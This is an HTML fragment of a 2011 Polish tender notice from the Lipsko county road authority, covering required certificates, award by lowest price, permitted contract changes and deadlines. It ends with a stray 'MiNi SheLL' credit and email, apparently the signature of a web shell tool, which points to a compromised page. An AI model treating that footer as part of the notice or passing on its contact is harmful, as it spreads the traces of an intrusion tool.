<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">G.1) Informacje o posiadanym laboratorium drogowym. W przypadku braku laboratorium drogowego, informacja o podmiocie wykonującym badania drogowe na zlecenie wykonawcy</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - wypełniony i podpisany przez wykonawcę. 2. Kosztorys ofertowy z cenami jednostkowymi i wartością robót stanowiącą całkowitą cenę zamówienia. 3. Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych. 4. Wykaz osób do kontaktów z zamawiającym odpowiedzialnych za wykonanie zobowiązań umowy. 5.Wzór umowy - parafowany przez wykonawcę. 6. Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych. 7. Dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty: 1) zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy; 2) zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy; 3) wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy. Zmiany o których mowa dopuszczone będą  pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdpl.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego adres jak w pkt.1. Na wniosek wykonawcy Zamawiający prześle S.I.W.Z. za zaliczeniem pocztowym. Opłata za udostępnienie specyfikacji wynosi 50 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2011 godzina 09:45, miejsce: w siedzibie Zamawiającego Powiatowy Zarząd Dróg Publicznych w Lipsku ul. Spacerowa 24 27-300 Lipsko. Pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 24.03.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com